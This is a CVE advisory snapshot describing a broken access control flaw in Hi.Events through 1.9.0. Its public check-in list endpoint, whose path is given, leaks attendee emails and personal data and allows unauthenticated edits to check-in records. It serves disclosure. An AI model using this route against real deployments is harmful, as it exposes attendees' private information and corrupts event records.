Description

Hi.Events through 1.9.0 public check-in list endpoints use short_id as sole access control, allowing unauthenticated access to retrieve full attendee lists including emails and personal information. Attackers with knowledge of the short_id can call GET /api/public/check-in-lists/{short_id}/attendees to read attendee data and create or delete check-in records without authentication.

Severity (CVSS)

Base score8.3
SeverityHigh
VersionCVSS 4.0
VectorCVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
Provided byCNA

Weaknesses

  • CWE-359 — Exposure of Private Personal Information to an Unauthorized Actor

Affected products

VendorProductVersions
HiEventsDevHi.Events0 to <=1.9.0

References

Authoritative sources

This page is a snapshot. For the latest enrichment and updates, view the record on CVE.org or the NVD.

Generated from the official CVE List on 30 Jun 2026 07:04 UTC.